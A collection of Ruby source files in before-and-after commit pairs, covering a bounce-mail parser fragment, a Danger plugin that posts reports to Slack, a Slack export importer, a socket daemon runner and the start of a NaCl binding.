      p[v] = p[v].delete('[]()') # Remove square brackets and curly brackets from the host variable
      p[v] = p[v].sub(/\A.+=/, '') # Remove string before "="
      p[v] = p[v].gsub(/\r\z/, '') # Remove CR at the end of the value
      # Check space character in each value
      if p[v] =~ / /
        # Get the first element
        p[v] = p[v].split(' ', 2).shift
      end
    end
    # Subject: header of the original message
    p['subject'] = rfc822data['subject'] || ''
    p['subject'] = p['subject'].gsub(/\r\z/, '')
    # The value of "List-Id" header
    p['listid'] = rfc822data['list-id'] || ''
    if p['listid'].size > 0
      # Get the value of List-Id header
      if cv = p['listid'].match(/\A.*([<].+[>]).*\z/)
        # List name <list-id@example.org>
        p['listid'] = cv[1]
      end
      p['listid'] = p['listid'].delete('<>')
      p['listid'] = p['listid'].gsub(/\r\z/, '')
      p['listid'] = '' if p['listid'] =~ / /
    end
    # The value of "Message-Id" header
    p['messageid'] = rfc822data['message-id'] || ''
    if p['messageid'].size > 0
      # Remove angle brackets
      if cv = p['messageid'].match(/\A([^ ]+)[ ].*/)
        p['messageid'] = cv[1]
      end
      p['messageid'] = p['messageid'].delete('<>')
      p['messageid'] = p['messageid'].gsub(/\r\z/, '')
    end
    # CHECK_DELIVERY_STATUS_VALUE:
    # Cleanup the value of "Diagnostic-Code:" header
    p['diagnosticcode'] = p['diagnosticcode'].sub(/[ \t]+#{EndOfEmail}/, '')
    d = Sisimai::SMTP::Status.find(p['diagnosticcode'])
    if d =~ /\A[45][.][1-9][.][1-9]\z/
      # Use the DSN value in Diagnostic-Code:
      p['deliverystatus'] = d
    end
    # Check the value of SMTP command
    p['smtpcommand'] = '' unless p['smtpcommand'] =~ rxcommands
    o = Sisimai::Data.new(p)
    next unless o.recipient
    if o.reason.empty? || RetryIndex.index(o.reason)
      # Decide the reason of email bounce
      r = ''
      if Sisimai::Rhost.match(o.rhost)
        # Remote host dependent error
        r = Sisimai::Rhost.get(o)
      end
      r = Sisimai::Reason.get(o) if r.empty?
      r = 'undefined' if r.empty?
      o.reason = r
    end
    if o.reason != 'feedback' && o.reason != 'vacation'
      # Bounce message which reason is "feedback" or "vacation" does
      # not have the value of "deliverystatus".
      if o.softbounce.to_s.empty?
        # The value is not set yet
        %w|deliverystatus diagnosticcode|.each do |v|
          # Set the value of softbounce
          next unless p[v].size > 0
          r = Sisimai::SMTP.is_softbounce(p[v])
          if r.nil?
            o.softbounce = -1
          else
            o.softbounce = r ? 1 : 0
          end
          break if o.softbounce > -1
        end
        o.softbounce = -1 if o.softbounce.to_s.empty?
      end
      if o.deliverystatus.empty?
        # Set pseudo status code
        torp = o.softbounce == 1 ? true : false
        pdsv = Sisimai::SMTP::Status.code(o.reason, torp)
        if pdsv.size > 0
          # Set the value of "deliverystatus" and "softbounce".
          o.deliverystatus = pdsv
          if o.softbounce == -1
            # Check the value of "softbounce" again
            torp = Sisimai::SMTP.is_softbounce(pdsv)
            if torp.nil?
              o.softbounce = -1
            else
              o.softbounce = torp ? 1 : 0
            end
          end
        end
      end
    else
      # The value of reason is "vacation" or "feedback"
      o.softbounce = -1
    end
    objectlist << o
  end
  return objectlist
end
# Convert from object to hash reference
# @return [Hash] Data in Hash reference
def damn
  # Flatten this object into a String-keyed Hash; address objects and the
  # timestamp are reduced to primitives, every other accessor defaults to ''.
  data = {}
  @@rwaccessors.each do |e|
    # Anchor the pattern: the previous /(?:addresser|recipient|timestamp)/
    # was unanchored and would also skip any future accessor that merely
    # contains one of these words as a substring.
    next if e.to_s =~ /\A(?:addresser|recipient|timestamp)\z/
    data[e.to_s] = self.send(e) || ''
  end
  data['addresser'] = self.addresser.address
  data['recipient'] = self.recipient.address
  data['timestamp'] = self.timestamp.to_time.to_i
  return data
end
alias :to_hash :damn
# Data dumper
# @param [String] type Data format: json, yaml
# @return [String, Undef] Dumped data or Undef if the value of first
# argument is neither "json" nor "yaml"
# Serialize this object.
# @param [String] type Data format: "json" or "yaml"
# @return [String, nil] Dumped data, or nil when type is neither "json"
#   nor "yaml"
def dump(type = 'json')
  return nil unless %w[json yaml].include?(type)
  referclass = sprintf('Sisimai::Data::%s', type.upcase)
  begin
    require referclass.downcase.gsub('::', '/')
  rescue LoadError
    # A bare "rescue" only catches StandardError; a failed require raises
    # LoadError (a ScriptError), so it must be named explicitly here or
    # the warning below can never fire.
    warn '***warning: Failed to load ' + referclass
  end
  dumpeddata = Module.const_get(referclass).dump(self)
  return dumpeddata
end
# JSON handler
# @return [String] JSON string converted from Sisimai::Data
def to_json(*)
  # Delegate to #dump with the JSON serializer
  dump('json')
end
end
end
|
module Danger
# Notify danger reports to slack.
#
# The following steps are required for using the danger-slack plugin.
# 1. create bot in https://my.slack.com/services/new/bot
# 2. invite created bot user to channel in slack app
#
# The bot's token starts with `xoxb-`
#
# @example Configure credentials to access the Slack API
# slack.api_token = YOUR_API_TOKEN
#
# @example Get channels
# message slack.channels.map {|channel| channel['name']}.join "\n"
#
# @example Get members
# message slack.members.map {|member| member['name'] }.join "\n"
#
# @example Notify danger reports to slack
# slack.notify(channel: '#your_channel')
#
# @example Post message to slack
# slack.notify(channel: '#your_channel', text: 'hello danger')
#
# @see duck8823/danger-slack
# @tags slack
#
class DangerSlack < Plugin
# API token to authenticate with SLACK API
#
# @return [String]
attr_accessor :api_token
def initialize(dangerfile)
  super(dangerfile)
  # Default the token from the environment; can be overridden later via
  # slack.api_token=
  @api_token = ENV['SLACK_API_TOKEN']
  # One Faraday connection reused for every Slack Web API request
  @conn = Faraday.new(url: 'https://slack.com/api')
end
# get slack team members
# For more information, see also https://api.slack.com/methods/users.list
#
# @return [[Hash]]
def members
  # users.list returns {"members" => [...]}; Array() guards a missing key
  response = @conn.get('users.list', token: @api_token)
  Array(JSON.parse(response.body)['members'])
end
# get slack team channels
# For more information, see also https://api.slack.com/methods/channels.list
#
# @return [[Hash]]
def channels
  # channels.list returns {"channels" => [...]}; Array() guards a missing key
  response = @conn.get('channels.list', token: @api_token)
  Array(JSON.parse(response.body)['channels'])
end
# get slack team groups (private channels)
# For more information, see also http://api.slack.com/methods/groups.list
#
# @return [[Hash]]
def groups
  # groups.list returns {"groups" => [...]}; Array() guards a missing key
  response = @conn.get('groups.list', token: @api_token)
  Array(JSON.parse(response.body)['groups'])
end
# notify to Slack
#
# @param [String] channel
# It is channel to be notified, defaults to '#general'
# @param [String] text
# text message posted to slack, defaults to nil.
# if nil, this method post danger reports to slack.
# @return [void]
def notify(channel: '#general', text: nil, **opts)
  # With no explicit text, post the danger report as attachments;
  # text.nil? (not truthiness) decides, so text: false still suppresses them.
  attachments_payload = text.nil? ? report : []
  message = text || '<http://danger.systems/|Danger> reports'
  @conn.post do |req|
    req.url 'chat.postMessage'
    req.params = {
      token: @api_token,
      channel: channel,
      text: message,
      attachments: attachments_payload.to_json,
      link_names: 1,
      **opts
    }
  end
end
private
# get status_report text
# @return [[Hash]]
def report
  # Map each non-empty section of Danger's status_report onto Slack
  # attachment hashes; 'markdowns' expands to one attachment per entry.
  colors = { 'errors' => 'danger', 'warnings' => 'warning', 'messages' => 'good' }
  sections = status_report.reject { |_, entries| entries.empty? }
  attachments = sections.map do |kind, entries|
    key = kind.to_s
    if colors.key?(key)
      { text: entries.join("\n"), color: colors[key] }
    elsif key == 'markdowns'
      entries.map { |markdown| { text: markdown.message, fields: fields(markdown) } }
    end
  end
  # flatten unnests the markdown sub-arrays (nil stays for unknown kinds,
  # matching the original case/when fallthrough)
  attachments.flatten
end
# get markdown fields
# @return [[Hash]]
def fields(markdown)
  # Build Slack attachment fields for the file/line of a markdown entry,
  # omitting whichever attribute is absent.
  result = []
  result << { title: 'file', value: markdown.file, short: true } if markdown.file
  result << { title: 'line', value: markdown.line, short: true } if markdown.line
  result
end
end
end
Add param
module Danger
# Notify danger reports to slack.
#
# The following steps are required for using the danger-slack plugin.
# 1. create bot in https://my.slack.com/services/new/bot
# 2. invite created bot user to channel in slack app
#
# The bot's token starts with `xoxb-`
#
# @example Configure credentials to access the Slack API
# slack.api_token = YOUR_API_TOKEN
#
# @example Get channels
# message slack.channels.map {|channel| channel['name']}.join "\n"
#
# @example Get members
# message slack.members.map {|member| member['name'] }.join "\n"
#
# @example Notify danger reports to slack
# slack.notify(channel: '#your_channel')
#
# @example Post message to slack
# slack.notify(channel: '#your_channel', text: 'hello danger')
#
# @see duck8823/danger-slack
# @tags slack
#
class DangerSlack < Plugin
# API token to authenticate with SLACK API
#
# @return [String]
attr_accessor :api_token
def initialize(dangerfile)
  super(dangerfile)
  # Default the token from the environment; can be overridden later via
  # slack.api_token=
  @api_token = ENV['SLACK_API_TOKEN']
  # One Faraday connection reused for every Slack Web API request
  @conn = Faraday.new(url: 'https://slack.com/api')
end
# get slack team members
# For more information, see also https://api.slack.com/methods/users.list
#
# @return [[Hash]]
def members
  # users.list returns {"members" => [...]}; Array() guards a missing key
  response = @conn.get('users.list', token: @api_token)
  Array(JSON.parse(response.body)['members'])
end
# get slack team channels
# For more information, see also https://api.slack.com/methods/channels.list
#
# @return [[Hash]]
def channels
  # channels.list returns {"channels" => [...]}; Array() guards a missing key
  response = @conn.get('channels.list', token: @api_token)
  Array(JSON.parse(response.body)['channels'])
end
# get slack team groups (private channels)
# For more information, see also http://api.slack.com/methods/groups.list
#
# @return [[Hash]]
def groups
  # groups.list returns {"groups" => [...]}; Array() guards a missing key
  response = @conn.get('groups.list', token: @api_token)
  Array(JSON.parse(response.body)['groups'])
end
# notify to Slack
#
# @param [String] channel
# It is channel to be notified, defaults to '#general'
# @param [String] text
# text message posted to slack, defaults to nil.
# if nil, this method post danger reports to slack.
# @param [Hash] **opts
# @return [void]
def notify(channel: '#general', text: nil, **opts)
  # With no explicit text, post the danger report as attachments;
  # text.nil? (not truthiness) decides, so text: false still suppresses them.
  attachments_payload = text.nil? ? report : []
  message = text || '<http://danger.systems/|Danger> reports'
  @conn.post do |req|
    req.url 'chat.postMessage'
    req.params = {
      token: @api_token,
      channel: channel,
      text: message,
      attachments: attachments_payload.to_json,
      link_names: 1,
      **opts
    }
  end
end
private
# get status_report text
# @return [[Hash]]
def report
  # Map each non-empty section of Danger's status_report onto Slack
  # attachment hashes; 'markdowns' expands to one attachment per entry.
  colors = { 'errors' => 'danger', 'warnings' => 'warning', 'messages' => 'good' }
  sections = status_report.reject { |_, entries| entries.empty? }
  attachments = sections.map do |kind, entries|
    key = kind.to_s
    if colors.key?(key)
      { text: entries.join("\n"), color: colors[key] }
    elsif key == 'markdowns'
      entries.map { |markdown| { text: markdown.message, fields: fields(markdown) } }
    end
  end
  # flatten unnests the markdown sub-arrays (nil stays for unknown kinds,
  # matching the original case/when fallthrough)
  attachments.flatten
end
# get markdown fields
# @return [[Hash]]
def fields(markdown)
  # Build Slack attachment fields for the file/line of a markdown entry,
  # omitting whichever attribute is absent.
  result = []
  result << { title: 'file', value: markdown.file, short: true } if markdown.file
  result << { title: 'line', value: markdown.line, short: true } if markdown.line
  result
end
end
end
|
require 'json'
require 'zip'
require 'fileutils'
require 'tmpdir'
require './lib/db'
class SlackImport
# Tag every message with the channel's id, then persist each one.
def import_messages(channel, messages)
  messages.each do |message|
    message['channel'] = channel[:id]
    insert_message(message)
  end
end
# Replace the stored channel list with the rows parsed from channels.json.
def import_channels(channels)
  replace_channels(channels)
end
# Replace the stored user list with the rows parsed from users.json.
def import_users(users)
  replace_users(users)
end
# format of exported file
#
# exported.zip
#
# - channels.json
# - users.json
# - channel/
# - 2015-01-01.json
# Extract a Slack export zip into a temp dir, then load channels, users
# and each per-channel message file into the database. The temp dir is
# always removed, even on failure.
def import_from_file(exported_file)
  dist = Dir.mktmpdir
  begin
    Zip::File.open(exported_file) do |zip|
      zip.each do |entry|
        entry.extract(dist + '/' + entry.to_s)
      end
      # File.open avoids Kernel#open's pipe-execution behavior on names
      # starting with "|"
      File.open(dist + '/channels.json') do |io|
        import_channels(JSON.load(io))
      end
      File.open(dist + '/users.json') do |io|
        import_users(JSON.load(io))
      end
      zip.each do |entry|
        # channel/2015-01-01.json
        # Zip entry names come back as ASCII-8BIT; reinterpret them as
        # UTF-8 so channels with unicode names split and match correctly.
        file_name = entry.name.dup.force_encoding('UTF-8')
        if !File.directory?(dist + '/' + file_name) && file_name.split('/').size > 1
          puts "import #{file_name}"
          channel = Channels.find(name: file_name.split('/')[0]).to_a[0]
          messages = JSON.load(entry.get_input_stream)
          import_messages(channel, messages)
        end
      end
    end
  ensure
    FileUtils.rm_r(dist)
  end
end
end
Fix error when importing unicode channel names
require 'json'
require 'zip'
require 'fileutils'
require 'tmpdir'
require './lib/db'
class SlackImport
# Tag every message with the channel's id, then persist each one.
def import_messages(channel, messages)
  messages.each do |message|
    message['channel'] = channel[:id]
    insert_message(message)
  end
end
# Replace the stored channel list with the rows parsed from channels.json.
def import_channels(channels)
  replace_channels(channels)
end
# Replace the stored user list with the rows parsed from users.json.
def import_users(users)
  replace_users(users)
end
# format of exported file
#
# exported.zip
#
# - channels.json
# - users.json
# - channel/
# - 2015-01-01.json
# Extract a Slack export zip into a temp dir, then load channels, users
# and each per-channel message file into the database. The temp dir is
# always removed, even on failure.
def import_from_file(exported_file)
  dist = Dir.mktmpdir
  begin
    Zip::File.open(exported_file) do |zip|
      zip.each do |entry|
        entry.extract(dist + '/' + entry.to_s)
      end
      # File.open avoids Kernel#open's pipe-execution behavior on names
      # starting with "|"
      File.open(dist + '/channels.json') do |io|
        import_channels(JSON.load(io))
      end
      File.open(dist + '/users.json') do |io|
        import_users(JSON.load(io))
      end
      zip.each do |entry|
        # channel/2015-01-01.json
        # Zip entry names come back as ASCII-8BIT; dup before the in-place
        # force_encoding so the entry's own name string is not mutated.
        file_name = entry.name.dup.force_encoding('UTF-8')
        # && instead of "and": same result here, without the low-precedence trap
        if !File.directory?(dist + '/' + file_name) && file_name.split('/').size > 1
          puts "import #{file_name}"
          channel = Channels.find(name: file_name.split('/')[0]).to_a[0]
          messages = JSON.load(entry.get_input_stream)
          import_messages(channel, messages)
        end
      end
    end
  ensure
    FileUtils.rm_r(dist)
  end
end
end
|
require "logger"
require "socket"
require "fileutils"
require "sockd/errors"
module Sockd
class Runner
attr_reader :options, :name
class << self
  # Factory alias: Sockd::Runner.define(...) is equivalent to .new(...)
  def define(*args, &block)
    new(*args, &block)
  end
end
# @param name    [String] daemon name, used for safe_name and the pid file
# @param options [Hash] overrides for the defaults below; may also carry
#   callable :setup / :teardown / :handle entries
def initialize(name, options = {}, &block)
  @name = name
  @options = {
    :host => "127.0.0.1",
    :port => 0,
    :socket => false,
    :daemonize => true,
    :pid_path => "/var/run/#{safe_name}.pid",
    :log_path => false,
    :force => false,
    :user => nil,
    :group => nil
  }.merge(options)
  # Callbacks may be supplied as callable options instead of blocks
  [:setup, :teardown, :handle].each do |opt|
    self.public_send(opt, &options[opt]) if options[opt].respond_to?(:call)
  end
  # ...or configured DSL-style via "yield self"
  yield self if block_given?
end
# merge options when set with self.options = {...}
# Merge (rather than replace) options assigned via self.options = {...}
def options=(val)
  # Hash#update is an alias of #merge!: merges in place
  @options.update(val)
end
# generate a path-safe and username-safe string from our daemon name
def safe_name
  # Strip leading digits and all non-alphanumerics from the daemon name.
  # NOTE(review): uses ^ (line anchor) rather than \A; identical for
  # single-line names — confirm names can never contain newlines.
  name.gsub(/(^[0-9]*|[^0-9a-z])/i, '')
end
# define a "setup" callback by providing a block, or trigger the callback
# @runner.setup { |opts| Server.new(...) }
def setup(&block)
  # With a block: store it as the setup callback and return self (the
  # condition both tests block_given? and assigns @setup).
  return self if block_given? && @setup = block
  # Without a block: invoke the stored callback, if any.
  @setup.call(self) if @setup
end
# define a "teardown" callback by providing a block, or trigger the callback
# @runner.teardown { log "shutting down" }
def teardown(&block)
  # With a block: store it as the teardown callback and return self (the
  # condition both tests block_given? and assigns @teardown).
  return self if block_given? && @teardown = block
  # Without a block: invoke the stored callback, if any.
  @teardown.call(self) if @teardown
end
# define our socket handler by providing a block, or trigger the callback
# with the provided message
# @runner.handle { |msg| if msg == 'foo' then return 'bar' ... }
def handle(message = nil, socket = nil, &block)
  # With a block: register it as the message handler and return self.
  return self if block_given? && @handle = block
  # Explicit guard replaces the original "@handle || (raise ...)"
  # expression, whose value was computed and discarded.
  raise SockdError, "No message handler provided." unless @handle
  @handle.call(message, socket)
end
# call one of start, stop, restart, or send
def run(method, *args)
if %w(start stop restart send).include?(method)
begin
self.public_send method.to_sym, *args
rescue ArgumentError => e
raise unless e.backtrace[1].include? "in `public_send"
raise BadCommandError, "wrong number of arguments for command: #{method}"
end
else
raise BadCommandError, "invalid command: #{method}"
end
end
# start our service
def start
if options[:daemonize]
pid = daemon_running?
raise ProcError, "#{name} process already running (#{pid})" if pid
log "starting #{name} process..."
return self unless daemonize
end
drop_privileges options[:user], options[:group]
setup
on_interrupt do |signal|
log "#{signal} received, shutting down..."
teardown
exit 130
end
serve
end
# stop our service
def stop
if daemon_running?
pid = stored_pid
Process.kill('TERM', pid)
log "SIGTERM sent to #{name} (#{pid})"
if !wait_until(2) { daemon_stopped? pid } && options[:force]
Process.kill('KILL', pid)
log "SIGKILL sent to #{name} (#{pid})"
end
raise ProcError.new("unable to stop #{name} process") if daemon_running?
else
log "#{name} process not running"
end
self
end
# restart our service
def restart
stop
start
end
# send a message to a running service and return the response
def send(*args)
raise ArgumentError if args.empty?
message = args.join(' ')
response = nil
begin
client do |sock|
sock.write message + "\r\n"
response = sock.gets
end
rescue Errno::ECONNREFUSED, Errno::ENOENT
unless daemon_running?
abort "#{name} process not running"
end
abort "unable to establish connection"
end
puts response
end
protected
# run a server loop, passing data off to our handler
def serve
server do |server|
log "listening on " + server.local_address.inspect_sockaddr
while 1
sock = server.accept
begin
# wait for input
if IO.select([sock], nil, nil, 2.0)
msg = sock.recv(256, Socket::MSG_PEEK)
if msg.chomp == "ping"
sock.print "pong\r\n"
else
handle msg, sock
end
else
log "connection timed out"
end
rescue Errno::EPIPE, Errno::ECONNRESET
log "connection broken"
end
sock.close unless sock.closed?
end
end
end
# return a UNIXServer or TCPServer instance depending on config
def server(&block)
if options[:socket]
UNIXServer.open(options[:socket], &block)
else
TCPServer.open(options[:host], options[:port], &block)
end
rescue Errno::EACCES
sock = options[:socket] || "#{options[:host]}:#{options[:port]}"
raise ProcError, "unable to open socket: #{sock} (check permissions)"
end
# return a UNIXSocket or TCPSocket instance depending on config
def client(&block)
if options[:socket]
UNIXSocket.open(options[:socket], &block)
else
TCPSocket.open(options[:host], options[:port], &block)
end
rescue Errno::EACCES
sock = options[:socket] || "#{options[:host]}:#{options[:port]}"
raise ProcError, "unable to open socket: #{sock} (check permissions)"
end
# handle process termination signals
def on_interrupt(&block)
trap("INT") { yield "SIGINT" }
trap("QUIT") { yield "SIGQUIT" }
trap("TERM") { yield "SIGTERM" }
end
# daemonize a process. returns true from the forked process, false otherwise
def daemonize
# ensure pid file and log file are writable if provided
pid_path = options[:pid_path] ? writable_file(options[:pid_path]) : nil
log_path = options[:log_path] ? writable_file(options[:log_path]) : nil
unless fork
Process.setsid
exit if fork
File.umask 0000
Dir.chdir "/"
# save pid file
File.open(pid_path, 'w') { |f| f.write Process.pid } if pid_path
# redirect our io
setup_logging(log_path)
# trap and ignore SIGHUP
Signal.trap('HUP') {}
# trap reopen our log files on SIGUSR1
Signal.trap('USR1') { setup_logging(log_path) }
return true
end
Process.waitpid
unless wait_until { daemon_running? }
raise ProcError, "failed to start #{@name} service"
end
end
# returns the process id if a daemon is running with our pid file
def daemon_running?(pid = nil)
pid ||= stored_pid
Process.kill(0, pid) if pid
pid
rescue Errno::ESRCH
false
end
# reverse of daemon_running?
def daemon_stopped?(pid = nil)
!daemon_running? pid
end
# drop privileges to the specified user and group
def drop_privileges(user, group)
uid = Etc.getpwnam(user).uid if user
gid = Etc.getgrnam(group).gid if group
gid = Etc.getpwnam(user).gid if group.nil? && user
Process::Sys.setuid(uid) if uid
Process::Sys.setgid(gid) if gid
rescue ArgumentError => e
# user or group does not exist
raise ProcError, "unable to drop privileges (#{e})"
end
# redirect our output as per configuration
def setup_logging(log_path)
log_path ||= '/dev/null'
$stdin.reopen '/dev/null'
$stdout.reopen(log_path, 'a')
$stderr.reopen $stdout
$stdout.sync = true
end
# returns the pid stored in our pid_path
def stored_pid
return false unless options[:pid_path]
path = File.expand_path(options[:pid_path])
return false unless File.file?(path) && !File.zero?(path)
File.read(path).chomp.to_i
end
# ensure a writable file exists at the specified path
def writable_file(path)
path = File.expand_path(path)
begin
FileUtils.mkdir_p(File.dirname(path), :mode => 0755)
FileUtils.touch path
File.chmod(0644, path)
rescue Errno::EACCES, Errno::EISDIR
end
unless File.file?(path) && File.writable?(path)
raise ProcError, "unable to open file: #{path} (check permissions)"
end
path
end
def wait_until(timer = 5, interval = 0.1, &block)
until timer < 0 or block.call
timer -= interval
sleep interval
end
timer > 0
end
def log(message)
puts Time.now.strftime('%Y-%m-%d %H:%M:%S: ') + message
end
end
end
clean up open unix sockets when exiting
require "logger"
require "socket"
require "fileutils"
require "sockd/errors"
module Sockd
  # Runner wraps a socket-serving daemon: it forks/daemonizes the process,
  # manages a pid file, listens on a TCP or UNIX socket, dispatches incoming
  # messages to a user-supplied handler block, and unlinks the UNIX socket
  # on shutdown.
  class Runner
    attr_reader :options, :name

    class << self
      # DSL-style constructor: Sockd::Runner.define("name") { |r| ... }
      def define(*args, &block)
        self.new(*args, &block)
      end
    end

    # name    - daemon name (used for the default pid file path and log lines)
    # options - see defaults below; :setup, :teardown and :handle callbacks may
    #           be passed as callables in the hash instead of via the block DSL
    def initialize(name, options = {}, &block)
      @name = name
      @options = {
        :host => "127.0.0.1",
        :port => 0,
        :socket => false,
        :daemonize => true,
        :pid_path => "/var/run/#{safe_name}.pid",
        :log_path => false,
        :force => false,
        :user => nil,
        :group => nil
      }.merge(options)
      # allow callbacks to be supplied directly in the options hash
      [:setup, :teardown, :handle].each do |opt|
        self.public_send(opt, &options[opt]) if options[opt].respond_to?(:call)
      end
      yield self if block_given?
    end

    # merge options when set with self.options = {...}
    def options=(val)
      @options.merge!(val)
    end

    # generate a path-safe and username-safe string from our daemon name
    def safe_name
      name.gsub(/(^[0-9]*|[^0-9a-z])/i, '')
    end

    # define a "setup" callback by providing a block, or trigger the callback
    #   @runner.setup { |opts| Server.new(...) }
    def setup(&block)
      # NOTE: the assignment inside the condition is intentional (store block)
      return self if block_given? && @setup = block
      @setup.call(self) if @setup
    end

    # define a "teardown" callback by providing a block, or trigger the callback
    #   @runner.teardown { log "shutting down" }
    def teardown(&block)
      return self if block_given? && @teardown = block
      @teardown.call(self) if @teardown
    end

    # define our socket handler by providing a block, or trigger the callback
    # with the provided message
    #   @runner.handle { |msg| if msg == 'foo' then return 'bar' ... }
    def handle(message = nil, socket = nil, &block)
      return self if block_given? && @handle = block
      @handle || (raise SockdError, "No message handler provided.")
      @handle.call(message, socket)
    end

    # call one of start, stop, restart, or send
    def run(method, *args)
      if %w(start stop restart send).include?(method)
        begin
          self.public_send method.to_sym, *args
        rescue ArgumentError => e
          # only swallow arity errors raised by the public_send call itself,
          # not ArgumentErrors raised from inside the command
          raise unless e.backtrace[1].include? "in `public_send"
          raise BadCommandError, "wrong number of arguments for command: #{method}"
        end
      else
        raise BadCommandError, "invalid command: #{method}"
      end
    end

    # start our service
    def start
      if options[:daemonize]
        pid = daemon_running?
        raise ProcError, "#{name} process already running (#{pid})" if pid
        log "starting #{name} process..."
        # the parent returns here; only the daemonized child keeps going
        return self unless daemonize
      end
      drop_privileges options[:user], options[:group]
      setup
      on_interrupt do |signal|
        log "#{signal} received, shutting down..."
        teardown
        # remove the UNIX socket file so the next start can bind cleanly
        cleanup
        exit 130
      end
      serve
    end

    # stop our service: SIGTERM first, SIGKILL after 2s when :force is set
    def stop
      if daemon_running?
        pid = stored_pid
        Process.kill('TERM', pid)
        log "SIGTERM sent to #{name} (#{pid})"
        if !wait_until(2) { daemon_stopped? pid } && options[:force]
          Process.kill('KILL', pid)
          log "SIGKILL sent to #{name} (#{pid})"
        end
        raise ProcError.new("unable to stop #{name} process") if daemon_running?
      else
        log "#{name} process not running"
      end
      self
    end

    # restart our service
    def restart
      stop
      start
    end

    # send a message to a running service and print the one-line response
    def send(*args)
      raise ArgumentError if args.empty?
      message = args.join(' ')
      response = nil
      begin
        client do |sock|
          sock.write message + "\r\n"
          response = sock.gets
        end
      rescue Errno::ECONNREFUSED, Errno::ENOENT
        unless daemon_running?
          abort "#{name} process not running"
        end
        abort "unable to establish connection"
      end
      puts response
    end

    protected

    # run a server loop, passing data off to our handler
    def serve
      server do |server|
        log "listening on " + server.local_address.inspect_sockaddr
        while 1
          sock = server.accept
          begin
            # wait for input
            if IO.select([sock], nil, nil, 2.0)
              # NOTE(review): MSG_PEEK leaves the payload queued on the socket,
              # so the handler is expected to read it again -- confirm handlers
              # actually re-read from `sock`.
              msg = sock.recv(256, Socket::MSG_PEEK)
              if msg.chomp == "ping"
                sock.print "pong\r\n"
              else
                handle msg, sock
              end
            else
              log "connection timed out"
            end
          rescue Errno::EPIPE, Errno::ECONNRESET
            log "connection broken"
          end
          sock.close unless sock.closed?
        end
      end
    end

    # return a UNIXServer or TCPServer instance depending on config
    def server(&block)
      if options[:socket]
        UNIXServer.open(options[:socket], &block)
      else
        TCPServer.open(options[:host], options[:port], &block)
      end
    rescue Errno::EACCES
      sock = options[:socket] || "#{options[:host]}:#{options[:port]}"
      raise ProcError, "unable to open socket: #{sock} (check permissions)"
    end

    # return a UNIXSocket or TCPSocket instance depending on config
    def client(&block)
      if options[:socket]
        UNIXSocket.open(options[:socket], &block)
      else
        TCPSocket.open(options[:host], options[:port], &block)
      end
    rescue Errno::EACCES
      sock = options[:socket] || "#{options[:host]}:#{options[:port]}"
      raise ProcError, "unable to open socket: #{sock} (check permissions)"
    end

    # clean up UNIXSocket upon termination
    def cleanup
      # NOTE(review): File.exists? is deprecated (removed in Ruby 3.2);
      # File.exist? is the modern spelling -- confirm target Ruby version.
      if options[:socket] && File.exists?(options[:socket])
        File.delete(options[:socket])
      end
    rescue StandardError
      raise ProcError, "unable to unlink socket: #{options[:socket]} (check permissions)"
    end

    # handle process termination signals
    def on_interrupt(&block)
      trap("INT") { yield "SIGINT" }
      trap("QUIT") { yield "SIGQUIT" }
      trap("TERM") { yield "SIGTERM" }
    end

    # daemonize a process. returns true from the forked process, false otherwise
    def daemonize
      # ensure pid file and log file are writable if provided
      pid_path = options[:pid_path] ? writable_file(options[:pid_path]) : nil
      log_path = options[:log_path] ? writable_file(options[:log_path]) : nil
      unless fork
        # classic double fork: detach from the controlling terminal
        Process.setsid
        exit if fork
        File.umask 0000
        Dir.chdir "/"
        # save pid file
        File.open(pid_path, 'w') { |f| f.write Process.pid } if pid_path
        # redirect our io
        setup_logging(log_path)
        # trap and ignore SIGHUP
        Signal.trap('HUP') {}
        # trap reopen our log files on SIGUSR1
        Signal.trap('USR1') { setup_logging(log_path) }
        return true
      end
      # parent: reap the intermediate child, then wait for the daemon to appear
      Process.waitpid
      unless wait_until { daemon_running? }
        raise ProcError, "failed to start #{@name} service"
      end
    end

    # returns the process id if a daemon is running with our pid file
    def daemon_running?(pid = nil)
      pid ||= stored_pid
      # kill(0, ...) probes for process existence without sending a signal
      Process.kill(0, pid) if pid
      pid
    rescue Errno::ESRCH
      # NOTE(review): Errno::EPERM (process exists but is owned by another
      # user) is not rescued and would propagate -- confirm that is intended.
      false
    end

    # reverse of daemon_running?
    def daemon_stopped?(pid = nil)
      !daemon_running? pid
    end

    # drop privileges to the specified user and group
    def drop_privileges(user, group)
      # NOTE(review): Etc is used here but "etc" is not among the visible
      # requires at the top of this file -- confirm it is loaded elsewhere.
      uid = Etc.getpwnam(user).uid if user
      gid = Etc.getgrnam(group).gid if group
      gid = Etc.getpwnam(user).gid if group.nil? && user
      Process::Sys.setuid(uid) if uid
      Process::Sys.setgid(gid) if gid
    rescue ArgumentError => e
      # user or group does not exist
      raise ProcError, "unable to drop privileges (#{e})"
    end

    # redirect our output as per configuration
    def setup_logging(log_path)
      log_path ||= '/dev/null'
      $stdin.reopen '/dev/null'
      $stdout.reopen(log_path, 'a')
      $stderr.reopen $stdout
      $stdout.sync = true
    end

    # returns the pid stored in our pid_path (false when absent or empty)
    def stored_pid
      return false unless options[:pid_path]
      path = File.expand_path(options[:pid_path])
      return false unless File.file?(path) && !File.zero?(path)
      File.read(path).chomp.to_i
    end

    # ensure a writable file exists at the specified path
    def writable_file(path)
      path = File.expand_path(path)
      begin
        FileUtils.mkdir_p(File.dirname(path), :mode => 0755)
        FileUtils.touch path
        File.chmod(0644, path)
      rescue Errno::EACCES, Errno::EISDIR
        # fall through to the writability check below
      end
      unless File.file?(path) && File.writable?(path)
        raise ProcError, "unable to open file: #{path} (check permissions)"
      end
      path
    end

    # poll the block every `interval` seconds for up to `timer` seconds;
    # returns true when the block became truthy before time ran out
    def wait_until(timer = 5, interval = 0.1, &block)
      until timer < 0 or block.call
        timer -= interval
        sleep interval
      end
      timer > 0
    end

    # timestamped logging to stdout
    def log(message)
      puts Time.now.strftime('%Y-%m-%d %H:%M:%S: ') + message
    end
  end
end
|
require 'sodium'
require 'ffi'
module Sodium::NaCl
  # Records the default primitive for a family class (e.g. Sodium::Auth).
  def self.nacl_default(klass, primitive)
    klass.const_set(:DEFAULT, primitive)
  end

  # Declares a NaCl primitive: defines a subclass of `scope`, registers it
  # as an implementation, and installs the constants and FFI-backed methods
  # described by the block. The block receives the (methods, constants)
  # hashes to populate.
  def self.nacl_family(scope, subclass, implementation)
    klass = _define_subclass(scope, subclass)
    family = _extract_family_name(scope)
    primitive = subclass.to_s.downcase.to_sym
    methods = {}
    constants = {
      :implementation => implementation,
      :primitive => primitive
    }
    yield methods, constants
    _install_implementation scope, klass, primitive
